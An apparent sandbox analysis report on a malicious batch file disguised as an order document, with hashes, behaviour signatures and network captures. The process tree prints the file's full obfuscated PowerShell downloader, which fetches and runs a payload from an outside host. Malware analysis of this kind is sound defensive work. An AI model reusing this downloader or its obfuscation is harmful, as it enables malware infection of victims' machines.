0546b035a94953d33a5c6d04bdc9521b49b2a98a51d38481b1f35667f5449326

Analysis

max time kernel
141s
max time network
103s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
17/10/2024, 14:40 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SKU_0001710-1-2024-SX-3762.bat
Size

5KB
MD5

fb6e5f4c35e2410abe92acca08412d29
SHA1

3e70e5fa943bf9ba4e2cadd21fc3b03a3ac899b8
SHA256

4f1b5d4bb6d0a7227948fb7ebb7765f3eb4b26288b52356453b74ea530111520
SHA512

3b7557f2429f2b420b59486a1bf40bf628d813257f0f4ac18d3141f3c0dc2661c71a18d16bffd24bb821993dbe8d58921befc72a6352282664526578d981068b
SSDEEP

96:huxRrcsSLAGiMygfOYiAx2MSauo6SrBJb4yr5BgDk:2rFSs3Hg5iAx2MSauoNVJ0yFBD

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
9	4576	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4576	powershell.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4576	powershell.exe
4576	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4576	powershell.exe

Suspicious use of WriteProcessMemory 2 IoCs

description	pid	Process	procid_target
PID 2312 wrote to memory of 4576	2312	cmd.exe	86
PID 2312 wrote to memory of 4576	2312	cmd.exe	86

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SKU_0001710-1-2024-SX-3762.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2312
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -windowstyle hidden " <#Derindad Telefonkdes Kroforvalterens knudshoveds #>;$Overimpressed215='Steroider115';<#Meso Allittereredes Sidelngder Petroleumsovn Markedsfringsomkostning #>;$Omittancesforstrke116=$Beseemingness+$host.UI;function Foreslaa($Tvivlstilfldet){If ($Omittancesforstrke116) {$Photoelectronics++;}$Transformationsprocesser=$Selskabsrevisors+$Tvivlstilfldet.'Length'-$Photoelectronics; for( $Omittance=4;$Omittance -lt $Transformationsprocesser;$Omittance+=5){$Benzanthrone++;$Vandsskader+=$Tvivlstilfldet[$Omittance];$Styreformerne15='Uproblematiske';}$Vandsskader;}function Heraclitean($Shagrag){ & ($Liljekonvals) ($Shagrag);}$Noden=Foreslaa 'CuprMTorpoStigzSc tiUninlS orlCarbaSkul/Lige ';$Noden+=Foreslaa 'Intr5 od.Slip0Poli Omf( Ed WBairiPreinRummd In oRandwHumosKjru FemaN recT Sta Ste1 Cab0Jux .Ixo 0 For;Sind TalaWGorbiVaesnHem 6.tvk4Afst; v.d SattxSt.b6Kabo4p.lk; Pet Visur etev Udh:Khed1Agit3Brig1Else. Lai0Edul)Deli spirGSlage rocLandkDemooW ys/ .ri2Di k0 .en1,ijo0Rest0Auto1Enla0Id.o1S am BosFAfskiMarkrP omeF ihf teo,entxRobo/U es1Sand3Trav1 Cou.Indl0a em ';$Deglutitive=Foreslaa 'MotiuSne,SHjesE An.RBou - RedaOto G K tE chenN nsTOxgo ';$Spisekortet=Foreslaa 'Glach P.itSubstMod.pDogg:Tiec/ I.t/ConnaHererFesttu.viiansaeFa nr diriCi r.cl.nrDecaohypn/At ogSfol/TessSPersk R,liEksifSko f gale.uchrNor d ErnkTy ek Un eBor re itsSprj.NunnpObstcEngrx.jla ';$Allineate=Foreslaa 'Fila>F.ru ';$Liljekonvals=Foreslaa '.amuIBisaePo.kxCor ';$Brneormens='Sybaritternes';$Omittanceronsided='\Rgnes.Und';Heraclitean (Foreslaa 'Forb$Ko,fgShorLUnifOEpigBC moASaprlOmf :kautFPromOU gyZPoutIForfnSu,pe AddSLunesKins=Co.e$ Lu,eQuesNSvnlVDell:UnscanonvPRingpDisuDkakiA omaTEquiAThys+Komp$ oodoSn wmU piiNoonTAwarTMag ABearnzibeCFortEUndeRKil o O,enYppesSystiAftedFarieDiopdMukk ');Heraclitean (Foreslaa 'or a$SvorG L,vLCe.tOko,mbSolba HypLOut,:WaremWearA P arU,vojBenfU So,Nfor Sanop= Cos$ConuSH.ftPFan I IsosRochELat k chaOUncorOmk,tCherelierTNe.p.Es asOrieP StrLS vsiLocutAfgi( Min$AkkuaG nzl CollPhalI BdeN higeS ngA ArmtIliaeTric) Sta ');Heraclitean (Foreslaa 'Pane[EscoNMythEDrysTHelt.scotS nhETovbrPladvRdbrICentCAfb EVas p ynaOO.tbIBedsnParat VapM orkaForbnMarmapenngHoppeShirrHals].nal:Leve:,uttSHov elovmcDisbU ,arRErriIEschTU bryDelkp AntRTeosOTunntKulkO NolCUdhooRendlPe.s Prey=Data U,or[ uleN ukeToldT Gez.Af,aSKl,keConscFormuNe tRManuIGysetspiryPrevPc.arrunr,OStamtCe loPhasCStamoD sil NomtaqqaY F lpschiE Ufo]Fend:E.cy:Rstetw nwlOmk sBerr1For,2Siti ');$Spisekortet=$marjuns[0];$Resident=(Foreslaa 'Para$Carag,verl FebOForebSe mAbattLRveh: ordoGoosVW geE EverEupssSu cp Ad rprofiG,lenI nkGHyraE,kerLskn.SCandEs bcRDe h=Fljenu.trE ExeWNon.-B skoBarnbTrskjWoodeOptrcUtydT Pre UncsWresY SansStertH,tteArmomPost. ditnNitrET.avto pa. Sumw D mEZealb ealcSuboLUntwiPerie PrenIntetTh e ');Heraclitean ($Resident);Heraclitean (Foreslaa 'Hand$klagOPecuvDyste HalrSt,msMundps,ntr ReniV ounTriagLygteS ralSplasKo oe Gadr.kol. LobHHugheTribaRet d CoveStatrA skstil [ sj $CentDelimeNazagTendlHuz.uNordtChoniisott wh iHjlpvI,eneCaml]S an= pec$ SkaN G ooFrd dAusce PernBog ');$Nrme=Foreslaa 'Unec$embrO.dspvUnbeeHabirStorsEn.hpp.lyrBr.tiNgtenDemyg lateIn rlKondsTalee tatrKomm.GodsDTricoHolowdc,an.ymplPortoUnpaaDemod SueFGradiBroklTeleeOnch(,ust$tilgSTjrepUmedi BunsHastespeakS aaoComprTilktSku eprictFort,El r$M ltUSyntnFoendCi,ieForlrToeiaPassfHydrkInfelBo b)Ge a ';$Underafkl=$foziness;Heraclitean (Foreslaa 'Etio$,iveGDeioLCucko BruBPe,tAP.olLP,ri:Re,eFIndpLSinuO H moSilisdisqiBreiEKaloS Beg1Narr8.lag6 Acc=Bund(IndgtFon EFormsOlietUnde-Diskp .ulaPro TPa,fh ub A te$Vic,ufyrbNKaradUdfoEBesmR St,aTop.F Hy KForflWa,e) Re ');while (!$Floosies186) {Heraclitean (Foreslaa 'Hoft$IndlgArmllVurdoEr,tbAnmeaV.lul Tux:RedaCPercrMikkeImfcaDisatStrue RemsBjer=Opbe$VisttStarrWhauu M,me Man ') ;Heraclitean $Nrme;Heraclitean (Foreslaa 'S alsforkTPrehA iar d sT,orh- ChrsPro lAnd.EUdm,e BalPCha, Bol4Hvep ');Heraclitean (Foreslaa 'Eth $BiotGFodklDyreoFetibSupeAPjanLPo a:Sem fBlablBasiOdjakOmusoSTirsIMetaeOld SSk o1Chur8 Paa6Eng =Manc(Nonet FatEWh rSSa.et G a-Ov rPRevoaCi,atBoycHvolu Trif$Ref UBombnCamodros eAntiRS peaAltafAgu kTripLHydr)Rece ') ;Heraclitean (Foreslaa 'Cara$ isgHumiL ConomistBunnaAKrumlOpaq:PseugOverlVidnu La T ousCHearh Tek= Pe $Var gAkkoLC mpO GrabPas,aT,lll Gra:Ta.sRstetuDisdtS ciIF,leNE sueSty r SkuE SattDump+Indt+Efte% Mol$PapuMB.agA StaRGrupjH.lduObseNgru STi.f.FremCNatiODebiuSpirn HjrtReka ') ;$Spisekortet=$marjuns[$Glutch];}$khalil=314533;$Humdrumness=30402;Heraclitean (Foreslaa ' ogh$ lgegJernL blnoex,ebPreoaContlTarh:Sa dFTalli MegN MedGphoteO strInteWElitoAs erAttrkPavi Afm= arn SneaGv.gteSlottInds-c itCE,phoNonpN sekTStjeeIndunFisktFast Ret$Nonauunhen ildU grEU hyRhy.oAHedaFFirekIntrlRaad ');Heraclitean (Foreslaa 'Sky $k.ttghonklSalooMiscbF rma dmilT,re:,bjeBB.colMicriAn lcProtkStraeRecoyStoc Disc= Syr nedt[CospSAmp yUnhys FhotBefle kammDamb.TinfCTetroToyinFamivGst eFedtrAuritPneu]R.go:Ayou:DampF Milr omoEx pmIrbiBEfteaYndlsFieleUnmi6Haem4LugeSfngst ronrMassiCabbnPectgExen(Reta$ CreF TiliS otnforkgReumeH.pprBilawImmooHekhrFormk All)Svrt ');Heraclitean (Foreslaa 'Coun$PrecGScanLS.inoKultBlamiaDr,tlYlva:Le,lUGodbPBortH,ounhTrauoStorvEfteE Tid Visi=Du d Fejl[ oths P lyUnemS,necT GloERevimOu.e.Ma stPsameGlycx BevtIacc. VicEHalvNBehacBrylo.lyaDfr diFny n ArgGForb]Frds:ove.:AbscAFormSTrilc Sk.iProei Tru.ScapGBrneEMolatUnbrs hagTIllerAfluiExhon,akkGFun ( S b$ akkbBusmlTr.aI,tancpr bKMange RhoYLo,a)Bron ');Heraclitean (Foreslaa 'pleu$BilaGSpidlSha OUppebPsycaHom LBaha:SkalHKdkrYFlocPBywaETot R SarPPan.YDa rr AssAAssemStimiRedlDHipf=Met $VelvuBiogP MedH dmHLionOAa eVDemoE,ejl.Opris veruTwisbnonoSUt.hT vatR jasIB,adnGli.G,nar(Sel $minik unkhExena OmplCumbIja.bLFork,Inco$ U rhStatuSubsmFolkDKroprmaegUA,grm LatNTylveS,ols LysS ynt) ina ');Heraclitean $Hyperpyramid;"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4576

Network

DNS

8.8.8.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.8.8.8.in-addr.arpa

IN PTR

Response

8.8.8.8.in-addr.arpa

IN PTR

dnsgoogle
DNS

232.168.11.51.in-addr.arpa

Remote address:

8.8.8.8:53

Request

232.168.11.51.in-addr.arpa

IN PTR

Response
DNS

172.210.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.210.232.199.in-addr.arpa

IN PTR

Response
DNS

artieri.ro

powershell.exe

Remote address:

8.8.8.8:53

Request

artieri.ro

IN A

Response

artieri.ro

IN A

89.44.138.129
GET

http://artieri.ro/g/Skifferdkkers.pcx

powershell.exe

Remote address:

89.44.138.129:80

Request

GET /g/Skifferdkkers.pcx HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: artieri.ro
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Thu, 17 Oct 2024 14:40:14 GMT
Content-Length: 1428
Connection: keep-alive
Content-Type: text/html
Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
Server: imunify360-webshield/1.21
DNS

129.138.44.89.in-addr.arpa

Remote address:

8.8.8.8:53

Request

129.138.44.89.in-addr.arpa

IN PTR

Response

129.138.44.89.in-addr.arpa

IN PTR

mxhostro
DNS

67.31.126.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

67.31.126.40.in-addr.arpa

IN PTR

Response
DNS

g.bing.com

Remote address:

8.8.8.8:53

Request

g.bing.com

IN A

Response

g.bing.com

IN CNAME

g-bing-com.ax-0001.ax-msedge.net

g-bing-com.ax-0001.ax-msedge.net

IN CNAME

ax-0001.ax-msedge.net

ax-0001.ax-msedge.net

IN A

150.171.27.10

ax-0001.ax-msedge.net

IN A

150.171.28.10
GET

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=cb347263508b4851851311187b666fdf&localId=w:0C449796-1E55-FEFD-C5A5-A0B044A63D2B&deviceId=6896208601980624&anid=

Remote address:

150.171.27.10:443

Request

GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=cb347263508b4851851311187b666fdf&localId=w:0C449796-1E55-FEFD-C5A5-A0B044A63D2B&deviceId=6896208601980624&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MUID=2875113D215265F110F1042620CD64B0; domain=.bing.com; expires=Tue, 11-Nov-2025 14:40:15 GMT; path=/; SameSite=None; Secure; Priority=High;
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 375569489E3F49B68BEE08F185FA0299 Ref B: LON601060104052 Ref C: 2024-10-17T14:40:15Z
date: Thu, 17 Oct 2024 14:40:14 GMT
GET

https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=cb347263508b4851851311187b666fdf&localId=w:0C449796-1E55-FEFD-C5A5-A0B044A63D2B&deviceId=6896208601980624&anid=

Remote address:

150.171.27.10:443

Request

GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=cb347263508b4851851311187b666fdf&localId=w:0C449796-1E55-FEFD-C5A5-A0B044A63D2B&deviceId=6896208601980624&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=2875113D215265F110F1042620CD64B0

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MSPTC=C_Ru95yJG79ScMtgxu6NgrbYZcdpuhF03EO_-nxVKdU; domain=.bing.com; expires=Tue, 11-Nov-2025 14:40:15 GMT; path=/; Partitioned; secure; SameSite=None
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 1CD61E9B27C848D49E457A0F8D3754B8 Ref B: LON601060104052 Ref C: 2024-10-17T14:40:15Z
date: Thu, 17 Oct 2024 14:40:14 GMT
GET

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=cb347263508b4851851311187b666fdf&localId=w:0C449796-1E55-FEFD-C5A5-A0B044A63D2B&deviceId=6896208601980624&anid=

Remote address:

150.171.27.10:443

Request

GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=cb347263508b4851851311187b666fdf&localId=w:0C449796-1E55-FEFD-C5A5-A0B044A63D2B&deviceId=6896208601980624&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=2875113D215265F110F1042620CD64B0; MSPTC=C_Ru95yJG79ScMtgxu6NgrbYZcdpuhF03EO_-nxVKdU

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 8372105AE286418F846E71451079813B Ref B: LON601060104052 Ref C: 2024-10-17T14:40:15Z
date: Thu, 17 Oct 2024 14:40:14 GMT
DNS

10.27.171.150.in-addr.arpa

Remote address:

8.8.8.8:53

Request

10.27.171.150.in-addr.arpa

IN PTR

Response
DNS

55.36.223.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

55.36.223.20.in-addr.arpa

IN PTR

Response
DNS

53.210.109.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

53.210.109.20.in-addr.arpa

IN PTR

Response
DNS

15.164.165.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

15.164.165.52.in-addr.arpa

IN PTR

Response
DNS

75.117.19.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

75.117.19.2.in-addr.arpa

IN PTR

Response

75.117.19.2.in-addr.arpa

IN PTR

a2-19-117-75deploystaticakamaitechnologiescom
DNS

79.190.18.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

79.190.18.2.in-addr.arpa

IN PTR

Response

79.190.18.2.in-addr.arpa

IN PTR

a2-18-190-79deploystaticakamaitechnologiescom
DNS

48.229.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

48.229.111.52.in-addr.arpa

IN PTR

Response
DNS

tse1.mm.bing.net

Remote address:

8.8.8.8:53

Request

tse1.mm.bing.net

IN A

Response

tse1.mm.bing.net

IN CNAME

mm-mm.bing.net.trafficmanager.net

mm-mm.bing.net.trafficmanager.net

IN CNAME

ax-0001.ax-msedge.net

ax-0001.ax-msedge.net

IN A

150.171.28.10

ax-0001.ax-msedge.net

IN A

150.171.27.10
GET

https://tse1.mm.bing.net/th?id=OADD2.10239340418583_14V7XNG13AXXMHR4D&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

Remote address:

150.171.28.10:443

Request

GET /th?id=OADD2.10239340418583_14V7XNG13AXXMHR4D&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 1145289
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 8D3D6EA9AFAD4DD9B0654198F4629034 Ref B: LON601060107042 Ref C: 2024-10-17T14:41:54Z
date: Thu, 17 Oct 2024 14:41:54 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239398629831_1XETNM7TBCG6PTKQG&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

Remote address:

150.171.28.10:443

Request

GET /th?id=OADD2.10239398629831_1XETNM7TBCG6PTKQG&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 644823
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: CDF85AE15D9A4D9586E5F9D61B3A374C Ref B: LON601060107042 Ref C: 2024-10-17T14:41:54Z
date: Thu, 17 Oct 2024 14:41:54 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239360526658_1O3WYEZK6VX7G9BK6&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

Remote address:

150.171.28.10:443

Request

GET /th?id=OADD2.10239360526658_1O3WYEZK6VX7G9BK6&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 550329
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 843A978713AF423AB283AA5AF21DFB46 Ref B: LON601060107042 Ref C: 2024-10-17T14:41:54Z
date: Thu, 17 Oct 2024 14:41:54 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239360526659_1DEB5NSYP58G2E8T3&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

Remote address:

150.171.28.10:443

Request

GET /th?id=OADD2.10239360526659_1DEB5NSYP58G2E8T3&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 586035
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: F5E85576D759452AA47FE6748E41A011 Ref B: LON601060107042 Ref C: 2024-10-17T14:41:54Z
date: Thu, 17 Oct 2024 14:41:54 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239340418584_19MU177BXG1FCVM1K&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

Remote address:

150.171.28.10:443

Request

GET /th?id=OADD2.10239340418584_19MU177BXG1FCVM1K&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 906468
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 06BD919D9E35402AA3B98AEE1A01DC34 Ref B: LON601060107042 Ref C: 2024-10-17T14:41:54Z
date: Thu, 17 Oct 2024 14:41:54 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239398629832_1AECK4YD8K87JKVB5&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

Remote address:

150.171.28.10:443

Request

GET /th?id=OADD2.10239398629832_1AECK4YD8K87JKVB5&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 488443
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 0D4B537B30A44629A43027F57726E935 Ref B: LON601060107042 Ref C: 2024-10-17T14:41:55Z
date: Thu, 17 Oct 2024 14:41:54 GMT

89.44.138.129:80

http://artieri.ro/g/Skifferdkkers.pcx

http

powershell.exe

403 B
1.8kB
5
4

HTTP Request

GET http://artieri.ro/g/Skifferdkkers.pcx

HTTP Response

200
150.171.27.10:443

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=cb347263508b4851851311187b666fdf&localId=w:0C449796-1E55-FEFD-C5A5-A0B044A63D2B&deviceId=6896208601980624&anid=

tls, http2

2.0kB
9.3kB
21
18

HTTP Request

GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=cb347263508b4851851311187b666fdf&localId=w:0C449796-1E55-FEFD-C5A5-A0B044A63D2B&deviceId=6896208601980624&anid=

HTTP Response

204

HTTP Request

GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=cb347263508b4851851311187b666fdf&localId=w:0C449796-1E55-FEFD-C5A5-A0B044A63D2B&deviceId=6896208601980624&anid=

HTTP Response

204

HTTP Request

GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=cb347263508b4851851311187b666fdf&localId=w:0C449796-1E55-FEFD-C5A5-A0B044A63D2B&deviceId=6896208601980624&anid=

HTTP Response

204
150.171.28.10:443

tse1.mm.bing.net

tls, http2

1.2kB
6.9kB
15
13
150.171.28.10:443

tse1.mm.bing.net

tls, http2

1.2kB
6.9kB
15
13
150.171.28.10:443

https://tse1.mm.bing.net/th?id=OADD2.10239398629832_1AECK4YD8K87JKVB5&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

tls, http2

153.4kB
4.5MB
3262
3254

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239340418583_14V7XNG13AXXMHR4D&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239398629831_1XETNM7TBCG6PTKQG&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239360526658_1O3WYEZK6VX7G9BK6&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239360526659_1DEB5NSYP58G2E8T3&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

HTTP Request

